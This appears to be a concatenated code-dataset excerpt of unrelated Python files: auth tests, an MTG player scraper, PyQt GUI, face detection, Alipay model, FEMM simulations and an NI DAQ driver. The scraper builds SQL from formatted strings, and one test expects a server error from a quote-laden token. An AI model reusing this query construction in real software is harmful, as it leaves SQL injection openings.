# print(r.status_code, r.data)
self.assertEqual(r.status_code,200)
def test_widget_2(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "4d94fc705cd9b2b36b2280dd543d9004"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah'}),
headers=headers)
self.assertEqual(r.status_code,403)
def test_widget_3(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "tokenwithsinglequote'"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
self.assertEqual(r.status_code,500)
def test_widget_4(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "unknowntoken"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
self.assertEqual(r.status_code,401)
if __name__ == '__main__':
unittest.main()
| 33.695122
| 107
| 0.566051
|
e380debf42eb8210370254ea98e490baf7f5c9c3
| 4,550
|
py
|
Python
|
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
mtgreatest-py/mtgreatest/scrape/players.py
|
oelarnes/mtgreatest
|
e2bf74fe9695302d6881e835e2cd1f5d2b312b5c
|
[
"MIT"
] | null | null | null |
import requests
import re
from functools import reduce  # reduce is used below and is not a builtin on Python 3
from bs4 import BeautifulSoup
from distance import levenshtein
from mtgreatest.rdb import Cursor, serialize
NUM_NORM_NAMES = 4
NORM_NAMES = ['norm_name_{}'.format(num) for num in range(NUM_NORM_NAMES)]
def fix_name_and_country(name, country):
if name is None:
return (name, country)
part = name.rpartition('[')
if len(part[0]):
return (part[0][:-1], part[1]+part[2])
else:
return (name, country)
def normalize_raw_name(raw_name):
raw_name = raw_name.upper()
sleep_in_patterns = ['ZVIP', 'ZZVIP', 'ZZZVIP', 'ZZ', 'ZZZ', 'ZZSIS', 'ZZFIX', 'ZZZ_', 'ZZZZZ', 'VIP', 'VIP_', 'AAVIP', 'AAA VIP -']
for pattern in sleep_in_patterns:
if raw_name.startswith(pattern) and not raw_name.startswith('VIPPERMAN'):
raw_name = raw_name.rpartition(pattern)[2]
elif raw_name.endswith(pattern):
raw_name = raw_name.partition(pattern)[0]
raw_name = raw_name.strip(' ()1234567890')
last_first = list(raw_name.partition(','))
last_first[0] = last_first[0].partition('[')[0].rstrip(' *').strip(' *')
last_first[2] = last_first[2].rpartition('SEE SK ')[2].strip(' *').rstrip(' *') #why?? what is this??
normalized_name = last_first[0]
if len(last_first[2]):
normalized_name += ', ' + last_first[2]
return normalized_name
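# Comment-only illustration (not from the original source): with the rules above, a raw
# pairings entry such as "ZZVIP Smith, John (3)" normalizes to "SMITH, JOHN"; the
# sleep-in/VIP prefix, seat number and surrounding whitespace are stripped and the name
# is upper-cased into "LAST, FIRST" form.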
def normalize_full_raw_name(full_raw_name):
return '/'.join([normalize_raw_name(name) for name in full_raw_name.split('/')])
def max_name_list(names1, names2):
ret_names = []
for name in names1:
if not any([name2.startswith(name) for name2 in names2]):
ret_names.append(name)
for name in names2:
if not any([name1.startswith(name) and len(name1)>len(name) for name1 in names1]):
ret_names.append(name)
return ret_names
def normalized_event_names(event_id):
cursor = Cursor()
num_rounds = cursor.execute("select max(round_num) from results_raw_table where event_id = '{}'".format(event_id))[0][0]
all_round_names = []
for round_num in range(num_rounds):
names = cursor.execute("select distinct p1_name_raw from results_raw_table where event_id = '{}' and round_num = {}".format(event_id, round_num))
names += cursor.execute("select distinct p2_name_raw from results_raw_table where event_id = '{}' and round_num = {}".format(event_id, round_num))
all_round_names.append(list(set([normalize_raw_name(item) for sublist in names for item in sublist if '* BYE *' not in item and 'Awarded Bye' not in item])))
cursor.close()
return reduce(max_name_list, all_round_names, [])
def populate_event_player_table(event_names, event_id):
cursor = Cursor()
cursor.execute("delete from event_player_table where event_id = {}".format(serialize(event_id)))
query = "select player_id, "
query += ', '.join(NORM_NAMES)
query += ' from player_table where '
or_ = False
for name in event_names:
if or_:
query += "or "
or_ = True
join_str = ' like {}'.format(serialize(name + '%'))
query += (join_str + ' or ').join(NORM_NAMES) + join_str
player_table_names = cursor.execute(query)
found_names = []
new_names = []
for name in event_names:
found = False
for idx, row in enumerate(player_table_names):
if name in row:
if found:
                    raise ValueError('two matches found for name ' + name)
found_names.append({'player_id':row[0], 'normalized_name':name, 'event_id':event_id})
found = True
if not found:
new_names.append(name)
player_id = cursor.execute("select max(player_id) from player_table")[0][0] or 1
new_players = []
for name in new_names:
player_id += 1
new_players.append({'player_id':player_id, 'norm_name_1':name, 'event_added':event_id, 'last_name':name.partition(',')[0],
'first_name':name.partition(', ')[2]})
found_names.append({'player_id':player_id, 'normalized_name':name, 'event_id':event_id})
cursor.insert('event_player_table', found_names)
cursor.insert('player_table', new_players)
cursor.close()
def remove_header_row():
query = "delete from results_raw_table where table_id like '%table%'"
cursor = Cursor()
cursor.execute(query);
cursor.close();
def combine_players(norm_name_1, norm_name_2):
query_template = "select * from player_table where "
query_template += ' or '.join([name + ' like {0}' for name in NORM_NAMES])
cursor = Cursor()
player_infos = [cursor.execute(query_template.format(serialize(name))) for name in (norm_name_1, norm_name_2)]
assert len(player_infos[0]) == 1 and len(player_infos[1]) == 1, "multiple or no matches found for a name"
| 39.224138
| 161
| 0.695824
|
ec3e3b9ff7e653c612e2deb9d9d4329753b86051
| 782
|
py
|
Python
|
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
coderatchet/scrapy-test
|
4f5febfca05d267dc98df94e65a403210ce39d81
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
test_utils.py
Copyright 2017 CodeRatchet
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
"""
from scrapytest.utils import find_first, merge_dict
def test_find_first_returns_none_on_condition_not_found():
assert find_first({'foo': 'bar', 'baz': 'spam'}, lambda x, y: False) is None
def test_merge_dict_sees_correct_values():
a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
assert merge_dict(b, a) == {'first': {'all_rows': {'pass': 'dog', 'fail': 'cat', 'number': '5'}}}
| 31.28
| 101
| 0.643223
|
a69ee7a9f888d8536f4bf36dc0bbbceb6bad0d24
| 1,333
|
py
|
Python
|
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
iotbx/command_line/pdb.box_around_molecule.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division, print_function
import sys
from cctbx import uctbx
import iotbx.pdb
from libtbx.option_parser import option_parser
import libtbx.load_env
from libtbx.str_utils import show_string
from libtbx.utils import date_and_time
import mmtbx.model
def run(args):
log = sys.stdout
if (len(args) == 0): args = ["--help"]
command_line = (option_parser(
usage="%s [options] pdb_file" % libtbx.env.dispatcher_name)
.option(None, "--buffer_layer",
action="store",
type="float",
default=5)
).process(args=args, nargs=1)
pdb_inp = iotbx.pdb.input(file_name=command_line.args[0])
model = mmtbx.model.manager(
model_input = pdb_inp)
box = uctbx.non_crystallographic_unit_cell_with_the_sites_in_its_center(
sites_cart=model.get_sites_cart(),
buffer_layer=command_line.options.buffer_layer)
model.set_sites_cart(box.sites_cart)
# Bad hack, never repeat. In fact, all the boxing functionality should
# go into mmtbx.model.manager
model._crystal_symmetry = box.crystal_symmetry()
  print('REMARK %s --buffer-layer=%.6g %s' % (
    libtbx.env.dispatcher_name,
    command_line.options.buffer_layer,
    show_string(command_line.args[0])), file=log)
  print('REMARK %s' % date_and_time(), file=log)
  print(model.model_as_pdb(), file=log)
if (__name__ == "__main__"):
run(sys.argv[1:])
| 32.512195
| 74
| 0.727682
|
dfa509f9568377b1ff1205997263da43054a7b7b
| 3,508
|
py
|
Python
|
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
src/gui_wall_widget.py
|
LiamTyler/ClimbingWallLEDController
|
99e65ab44e9bd84ac3dbe76ba4a3d66f24ba3c9e
|
[
"MIT"
] | null | null | null |
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from routes import *
STENCIL_FONT = QFont( QFont( 'Arial', 16 ) )
STENCIL_FONT.setBold( True )
class WallHold( QWidget ):
def __init__( self, row, col, editable = False ):
super().__init__()
self.setFixedSize( QSize( 40, 40 ) )
self.row = row
self.col = col
self.status = HoldStatus.UNUSED
self.editable = editable
def GetCoord( self ):
return chr( 65 + self.col ) + str( self.row + 1 )
def paintEvent( self, event ):
p = QPainter( self )
rect = event.rect()
color = Qt.white
if self.status == HoldStatus.START:
color = Qt.green
elif self.status == HoldStatus.REGULAR:
color = Qt.blue
elif self.status == HoldStatus.FINISH:
color = Qt.red
p.fillRect( rect, QBrush( color ) )
pen = QPen( color )
pen.setWidth( 0 )
p.setPen( pen )
p.drawRect( rect )
def mouseReleaseEvent( self, e ):
if self.editable:
self.status = (self.status + 1) % HoldStatus.COUNT
self.update()
class WallStencil( QWidget ):
def __init__( self, text ):
super().__init__()
self.text = text
self.setFixedSize( QSize( 40, 40 ) )
def paintEvent(self, event):
qp = QPainter( self )
qp.setRenderHint( QPainter.Antialiasing )
qp.setPen( Qt.black )
qp.setFont( STENCIL_FONT )
qp.drawText( event.rect(), Qt.AlignCenter, self.text )
class WallWidget( QWidget ):
def __init__( self ):
super().__init__()
self.gridLayout = QGridLayout()
self.setLayout( self.gridLayout )
self.setSizePolicy( QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed )
#self.setSpacing( 5 )
# grid starts in upper left corner, but wall starts in lower left
for row in range( 0, WALL_ROWS + 1 ):
for col in range( 0, WALL_COLS + 1 ):
wallRow = WALL_ROWS - row
w = None
if row > 0 and col == 0:
w = WallStencil( str( wallRow + 1 ) )
elif row == 0 and col > 0:
w = WallStencil( chr( 65 + col - 1 ) )
elif row > 0 and col > 0:
w = WallHold( wallRow, col - 1, False )
                if w is not None:
self.gridLayout.addWidget( w, row, col )
def SetEditable( self, isEditable ):
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget().editable = isEditable
def DrawRoute( self, route ):
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget().status = HoldStatus.UNUSED
for hold in route.holds:
wallRow = WALL_ROWS - hold.row
self.gridLayout.itemAtPosition( wallRow, hold.col + 1 ).widget().status = hold.status
def GetCurrentlyDrawnHolds( self ):
holds = []
for row in range( 0, WALL_ROWS ):
for col in range( 0, WALL_COLS ):
w = self.gridLayout.itemAtPosition( row + 1, col + 1 ).widget()
if w.status != HoldStatus.UNUSED:
holds.append( Hold( w.row, w.col, w.status ) )
return holds
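# Stand-alone sketch (not part of the original file): embedding WallWidget in a bare
# window. It assumes PyQt5 is installed and that routes.py provides WALL_ROWS,
# WALL_COLS and HoldStatus, as the imports at the top of this module already require.
if __name__ == '__main__':
    import sys
    app = QApplication( sys.argv )
    wall = WallWidget()
    wall.SetEditable( True ) # clicking a hold now cycles through its HoldStatus values
    wall.show()
    sys.exit( app.exec_() )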
| 34.732673
| 102
| 0.547891
|
317fd8b22d2428aa9dff95d98505d7e70f02706e
| 1,933
|
py
|
Python
|
src/face_detector.py
|
yariv1025/FACIAL_EMOTION_RECOGNITION
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | null | null | null |
src/face_detector.py
|
yariv1025/FACIAL_EMOTION_RECOGNITION
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | 4
|
2021-03-04T10:07:49.000Z
|
2021-03-04T15:31:10.000Z
|
src/face_detector.py
|
yariv1025/EmotionRec
|
1141912271a6ed336db60856552e20282dfd6a60
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from mtcnn.mtcnn import MTCNN
class FaceDetector(MTCNN):
"""
Perform facial detection.
"""
def __init__(self):
"""
Creating FaceDetector object by calling to the super class constructor (MTCNN).
"""
super().__init__()
self.no_face_time = 0
self.temp_timer = None
self.prev = True
def get_face(self, img):
"""
        Detects faces in an image.
        If faces have been detected, returns the bounding boxes for the faces relative to the specified image.
        Otherwise, returns an empty list.
:param img: image/frame to process.
:return: list containing all the bounding boxes detected with their key-points.
"""
return self.detect_faces(img)
def has_face(self, img):
"""
Face verification within an image.
:param img: image/frame to process.
        :return: False if no face is detected; otherwise, the list of detected faces.
"""
faces = self.get_face(img)
if len(faces) > 0 and self.prev:
return faces
elif len(faces) > 0 and not self.prev:
self.prev = True
self.stop_timer()
return faces
elif len(faces) == 0 and self.prev:
self.prev = False
self.start_timer()
return False
elif len(faces) == 0 and not self.prev:
return False
def start_timer(self):
"""
Initializes the timer to count when no faces are detected in the image.
"""
self.temp_timer = datetime.now()
return self.temp_timer
def stop_timer(self):
"""
        Accumulate the total time during which no faces were detected in the image stream.
"""
self.no_face_time = self.no_face_time + (datetime.now() - self.temp_timer).total_seconds()
self.temp_timer = None
return self.temp_timer
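# Minimal usage sketch (not part of the module); it assumes OpenCV is installed, a
# webcam is available, and that the MTCNN detector expects RGB input. Everything below
# is illustrative only and therefore left commented out.
# import cv2
# detector = FaceDetector()
# capture = cv2.VideoCapture(0)
# ok, frame = capture.read()
# if ok:
#     faces = detector.has_face(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
#     print(faces if faces else 'no face detected')
#     print('seconds without a face so far:', detector.no_face_time)
# capture.release()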
| 29.738462
| 111
| 0.588205
|
2182c65c56102f99f82fd0c563332a054b4d2ee7
| 1,795
|
py
|
Python
|
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/KoubeiMerchantDepartmentTreeQueryModel.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantDepartmentTreeQueryModel(object):
def __init__(self):
self._auth_code = None
self._dept_id = None
self._type = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
@property
def dept_id(self):
return self._dept_id
@dept_id.setter
def dept_id(self, value):
self._dept_id = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.auth_code:
if hasattr(self.auth_code, 'to_alipay_dict'):
params['auth_code'] = self.auth_code.to_alipay_dict()
else:
params['auth_code'] = self.auth_code
if self.dept_id:
if hasattr(self.dept_id, 'to_alipay_dict'):
params['dept_id'] = self.dept_id.to_alipay_dict()
else:
params['dept_id'] = self.dept_id
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMerchantDepartmentTreeQueryModel()
if 'auth_code' in d:
o.auth_code = d['auth_code']
if 'dept_id' in d:
o.dept_id = d['dept_id']
if 'type' in d:
o.type = d['type']
return o
| 25.28169
| 69
| 0.56546
|
015fa1833f42898327317629bf34ca5071e4d3b4
| 7,531
|
py
|
Python
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 95
|
2019-01-23T04:19:45.000Z
|
2022-03-17T18:22:10.000Z
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 366
|
2019-02-20T07:15:08.000Z
|
2022-03-31T13:37:23.000Z
|
Tests/Validation/Magnetics/test_FEMM_parallelization.py
|
EmileDvs/pyleecan
|
ad2f5f25c089a981f373557a198da51c62407928
|
[
"Apache-2.0"
] | 74
|
2019-01-24T01:47:31.000Z
|
2022-02-25T05:44:42.000Z
|
from os.path import join
from time import time
import pytest
from numpy import array, pi
from numpy.testing import assert_allclose
from Tests import save_validation_path as save_path
from pyleecan.Classes.ImportGenVectLin import ImportGenVectLin
from pyleecan.Classes.ImportMatrixVal import ImportMatrixVal
from pyleecan.Classes.InputCurrent import InputCurrent
from pyleecan.Classes.MagFEMM import MagFEMM
from pyleecan.Classes.Simu1 import Simu1
from pyleecan.Functions.load import load
from pyleecan.Functions.Plot import dict_2D
from pyleecan.definitions import DATA_DIR
@pytest.mark.long_5s
@pytest.mark.MagFEMM
@pytest.mark.IPMSM
@pytest.mark.parallel
@pytest.mark.periodicity
@pytest.mark.SingleOP
def test_FEMM_parallelization_mag():
"""test parallelization of FEMM to get B, Tem, PhiWind"""
Toyota_Prius = load(join(DATA_DIR, "Machine", "Toyota_Prius.json"))
simu = Simu1(name="test_FEMM_parallelization_mag", machine=Toyota_Prius)
# Definition of a sinusoidal current
simu.input = InputCurrent()
simu.input.Id_ref = -100 # [A]
simu.input.Iq_ref = 200 # [A]
simu.input.Nt_tot = 16 # Number of time step
simu.input.Na_tot = 1024 # Spatial discretization
simu.input.N0 = 2000 # Rotor speed [rpm]
# Definition of the magnetic simulation
simu.mag = MagFEMM(
type_BH_stator=2,
type_BH_rotor=2,
is_periodicity_a=True,
is_periodicity_t=True,
)
simu2 = simu.copy()
simu2.mag.nb_worker = 2
start = time()
out = simu.run()
time1 = time() - start
start = time()
out2 = simu2.run()
time2 = time() - start
print(
"Execution with one worker: {:.1f}s ||| {:d} workers {:.1f}".format(
time1, simu2.mag.nb_worker, time2
)
)
    # simulation with Nt_tot < nb_worker
simu3 = simu.copy()
simu3.mag.nb_worker = 8
simu3.input.Nt_tot = 4
simu3.run()
    # Plot the result by comparing the first two simulations
out.mag.B.plot_2D_Data(
"angle{°}",
"time[0]",
data_list=[out2.mag.B],
legend_list=["Serial", "Parallelization"],
save_path=join(save_path, simu.name + "_B_t0.png"),
is_show_fig=False,
**dict_2D
)
out.mag.B.plot_2D_Data(
"angle{°}",
"time[0]",
data_list=[out2.mag.B],
legend_list=["Serial", "Parallelization"],
save_path=join(save_path, simu.name + "_B_t1.png"),
is_show_fig=False,
**dict_2D
)
out.mag.Tem.plot_2D_Data(
"time",
data_list=[out2.mag.Tem],
legend_list=["Periodic", "Full"],
save_path=join(save_path, simu.name + "_Tem.png"),
is_show_fig=False,
**dict_2D
)
out.mag.Phi_wind_stator.plot_2D_Data(
"time",
"phase",
data_list=[out2.mag.Phi_wind_stator],
legend_list=["Periodic", "Full"],
save_path=join(save_path, simu.name + "_Phi_wind_stator.png"),
is_show_fig=False,
**dict_2D
)
assert_allclose(
out.mag.B.components["tangential"].values,
out2.mag.B.components["tangential"].values,
rtol=1e-5,
atol=1e-6,
)
assert_allclose(
out.mag.B.components["radial"].values,
out2.mag.B.components["radial"].values,
rtol=1e-5,
atol=1e-5,
)
assert_allclose(out.mag.Tem.values, out2.mag.Tem.values, rtol=1e-5, atol=1e-5)
return out, out2
@pytest.mark.long_5s
@pytest.mark.MagFEMM
@pytest.mark.SPMSM
@pytest.mark.parallel
@pytest.mark.MeshSol
@pytest.mark.periodicity
@pytest.mark.SingleOP
def test_FEMM_parallelization_meshsolution():
"""test parallelization of FEMM to get meshsolution"""
SPMSM_003 = load(join(DATA_DIR, "Machine", "SPMSM_003.json"))
simu = Simu1(name="test_FEMM_parallelization_meshsolution", machine=SPMSM_003)
# Definition of the enforced output of the electrical module
N0 = 3000
Is = ImportMatrixVal(
value=array(
[
[6.97244193e-06, 2.25353053e02, -2.25353060e02],
[-2.60215295e02, 1.30107654e02, 1.30107642e02],
[-6.97244208e-06, -2.25353053e02, 2.25353060e02],
[2.60215295e02, -1.30107654e02, -1.30107642e02],
]
)
)
time = ImportGenVectLin(start=0, stop=0.015, num=4, endpoint=True)
angle = ImportGenVectLin(start=0, stop=2 * pi, num=1024, endpoint=False)
simu.input = InputCurrent(
Is=Is,
Ir=None, # No winding on the rotor
N0=N0,
angle_rotor=None, # Will be computed
time=time,
angle=angle,
angle_rotor_initial=0.5216 + pi,
)
# Definition of the magnetic simulation (no symmetry)
simu.mag = MagFEMM(
type_BH_stator=2,
type_BH_rotor=2,
is_periodicity_a=False,
is_periodicity_t=False,
is_get_meshsolution=True,
nb_worker=1,
)
simu.force = None
simu.struct = None
simu2 = simu.copy()
simu2.mag.nb_worker = 3
simu2.name += "_parallel"
out = simu.run()
out2 = simu2.run()
# %%
# Plots solution computed without parallelization
out.mag.meshsolution.plot_mesh(
save_path=join(save_path, simu.name + "_mesh_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_mesh(
group_names="stator core",
save_path=join(save_path, simu.name + "_mesh_stator_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_mesh(
group_names=["stator core", "/", "airgap", "stator winding"],
save_path=join(
save_path,
simu.name + "_mesh_stator_interface_not_parallel.png",
),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="\mu",
save_path=join(save_path, simu.name + "_mu_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="B",
save_path=join(save_path, simu.name + "_B_not_parallel.png"),
is_show_fig=False,
)
out.mag.meshsolution.plot_contour(
label="H",
save_path=join(save_path, simu.name + "_H_not_parallel.png"),
is_show_fig=False,
)
# %%
# Plots solution computed with parallelization
out2.mag.meshsolution.plot_mesh(
save_path=join(save_path, simu.name + "_mesh_parallel.png"), is_show_fig=False
)
out2.mag.meshsolution.plot_mesh(
group_names="stator core",
save_path=join(save_path, simu.name + "_mesh_stator_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_mesh(
group_names=["stator core", "/", "airgap", "stator winding"],
save_path=join(
save_path,
simu.name + "_mesh_stator_interface_parallel.png",
),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="\mu",
save_path=join(save_path, simu.name + "_mu_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="B",
save_path=join(save_path, simu.name + "_B_parallel.png"),
is_show_fig=False,
)
out2.mag.meshsolution.plot_contour(
label="H",
save_path=join(save_path, simu.name + "_H_parallel.png"),
is_show_fig=False,
)
return out, out2
if __name__ == "__main__":
out, out2 = test_FEMM_parallelization_mag()
# out3, out4 = test_FEMM_parallelization_meshsolution()
| 28.31203
| 86
| 0.634577
|
0952f0fb396ba9a4ae41dfb0b7528e4b2e337e91
| 39,307
|
py
|
Python
|
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
labscript_devices/NI_USB_6343.py
|
specialforcea/labscript_suite
|
a4ad5255207cced671990fff94647b1625aa0049
|
[
"BSD-2-Clause"
] | null | null | null |
#####################################################################
# #
# /NI_USB_6343.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the module labscript_devices, in the #
# labscript suite (see http://labscriptsuite.org), and is #
# licensed under the Simplified BSD License. See the license.txt #
# file in the root of the project for the full license. #
# #
#####################################################################
from labscript import LabscriptError
from labscript_devices import labscript_device, BLACS_tab, BLACS_worker, runviewer_parser
from labscript import AnalogOut, StaticAnalogOut, DigitalOut, StaticDigitalOut, AnalogIn
import labscript_devices.NIBoard as parent
import numpy as np
import labscript_utils.h5_lock, h5py
import labscript_utils.properties
@labscript_device
class NI_USB_6343(parent.NIBoard):
description = 'NI-USB-6343'
def __init__(self, name, parent_device, **kwargs):
parent.NIBoard.__init__(self, name, parent_device, call_parents_add_device=False, **kwargs)
self.allowed_children = [AnalogOut, DigitalOut, AnalogIn]
self.num_AO = 4
self.num_DO = 32
self.dtype_DO = np.uint32
self.num_AI = 32
self.clock_limit = 700e3
# Now call this to get the clock right
self.parent_device.add_device(self)
import time
from blacs.tab_base_classes import Worker, define_state
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
from blacs.device_base_class import DeviceTab
@BLACS_tab
class NI_USB_6343Tab(DeviceTab):
def initialise_GUI(self):
# Capabilities
num = {'AO':4, 'DO':32, 'PFI':16}
base_units = {'AO':'V'}
base_min = {'AO':-10.0}
base_max = {'AO':10.0}
base_step = {'AO':0.1}
base_decimals = {'AO':3}
# Create the AO output objects
ao_prop = {}
for i in range(num['AO']):
ao_prop['ao%d'%i] = {'base_unit':base_units['AO'],
'min':base_min['AO'],
'max':base_max['AO'],
'step':base_step['AO'],
'decimals':base_decimals['AO']
}
do_prop = {}
for i in range(num['DO']):
do_prop['port0/line%d'%i] = {}
pfi_prop = {}
for i in range(num['PFI']):
pfi_prop['PFI %d'%i] = {}
# Create the output objects
self.create_analog_outputs(ao_prop)
# Create widgets for analog outputs only
dds_widgets,ao_widgets,do_widgets = self.auto_create_widgets()
# now create the digital output objects
self.create_digital_outputs(do_prop)
self.create_digital_outputs(pfi_prop)
# manually create the digital output widgets so they are grouped separately
do_widgets = self.create_digital_widgets(do_prop)
pfi_widgets = self.create_digital_widgets(pfi_prop)
def do_sort(channel):
flag = channel.replace('port0/line','')
flag = int(flag)
return '%02d'%(flag)
def pfi_sort(channel):
flag = channel.replace('PFI ','')
flag = int(flag)
return '%02d'%(flag)
# and auto place the widgets in the UI
self.auto_place_widgets(("Analog Outputs",ao_widgets),("Digital Outputs",do_widgets,do_sort),("PFI Outputs",pfi_widgets,pfi_sort))
# Store the Measurement and Automation Explorer (MAX) name
self.MAX_name = str(self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection)
# Create and set the primary worker
self.create_worker("main_worker",NI_USB_6343Worker,{'MAX_name':self.MAX_name, 'limits': [base_min['AO'],base_max['AO']], 'num':num})
self.primary_worker = "main_worker"
self.create_worker("wait_monitor_worker",NI_USB_6343WaitMonitorWorker,{'MAX_name':self.MAX_name})
self.add_secondary_worker("wait_monitor_worker")
self.create_worker("acquisition_worker",NI_USB_6343AcquisitionWorker,{'MAX_name':self.MAX_name})
self.add_secondary_worker("acquisition_worker")
# Set the capabilities of this device
self.supports_remote_value_check(False)
self.supports_smart_programming(False)
@BLACS_worker
class NI_USB_6343Worker(Worker):
def init(self):
exec 'from PyDAQmx import Task, DAQmxResetDevice' in globals()
exec 'from PyDAQmx.DAQmxConstants import *' in globals()
exec 'from PyDAQmx.DAQmxTypes import *' in globals()
global pylab; import pylab
global numpy; import numpy
global h5py; import labscript_utils.h5_lock, h5py
import zprocess.locking
import socket
# Setup lock for NIDAQmx_calls on this machine
key = socket.gethostname() + '-NI_DAQ_API'
self.NIDAQ_API_lock = zprocess.locking.Lock(key)
with self.NIDAQ_API_lock:
# Reset Device
DAQmxResetDevice(self.MAX_name)
# Create task
self.ao_task = Task()
self.ao_read = int32()
self.ao_data = numpy.zeros((self.num['AO'],), dtype=numpy.float64)
# Create DO task:
self.do_task = Task()
self.do_read = int32()
self.do_data = numpy.zeros(self.num['DO']+self.num['PFI'],dtype=numpy.uint8)
self.setup_static_channels()
#DAQmx Start Code
self.ao_task.StartTask()
self.do_task.StartTask()
def setup_static_channels(self):
#setup AO channels
for i in range(self.num['AO']):
self.ao_task.CreateAOVoltageChan(self.MAX_name+"/ao%d"%i,"",self.limits[0],self.limits[1],DAQmx_Val_Volts,None)
#setup DO ports
self.do_task.CreateDOChan(self.MAX_name+"/port0/line0:7","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line8:15","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line16:23","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port0/line24:31","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port1/line0:7","",DAQmx_Val_ChanForAllLines)
self.do_task.CreateDOChan(self.MAX_name+"/port2/line0:7","",DAQmx_Val_ChanForAllLines)
def shutdown(self):
self.ao_task.StopTask()
self.ao_task.ClearTask()
self.do_task.StopTask()
self.do_task.ClearTask()
def program_manual(self,front_panel_values):
